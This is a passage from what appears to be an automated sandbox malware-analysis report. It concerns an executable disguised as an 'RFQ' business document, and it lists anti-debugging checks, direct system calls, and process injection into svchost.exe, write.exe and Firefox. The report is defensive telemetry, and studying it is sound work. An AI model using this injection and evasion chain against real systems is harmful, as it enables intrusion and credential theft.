            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A04B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03928B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03968A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A04A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03986AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03930AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A04940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0397096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03930887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A008C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03952835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0041F250 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: NULL target: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe protection: read write
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: NULL target: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\write.exe | Thread register set: target process: 2104
            Source: C:\Windows\SysWOW64\write.exe | Thread APC queued: target process: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EE8008
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00436CD7 LogonUserW
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe"
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
            Source: C:\Windows\SysWOW64\write.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: RFQ - HTS45785-24-0907I000.exe, TNPukQnytLH.exe, 00000005.00000002.4161281149.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000000.2093542011.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161544199.0000000000E70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: TNPukQnytLH.exe, 00000005.00000002.4161281149.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000000.2093542011.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161544199.0000000000E70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: TNPukQnytLH.exe, 00000005.00000002.4161281149.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000000.2093542011.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161544199.0000000000E70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: TNPukQnytLH.exe, 00000005.00000002.4161281149.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000000.2093542011.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161544199.0000000000E70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
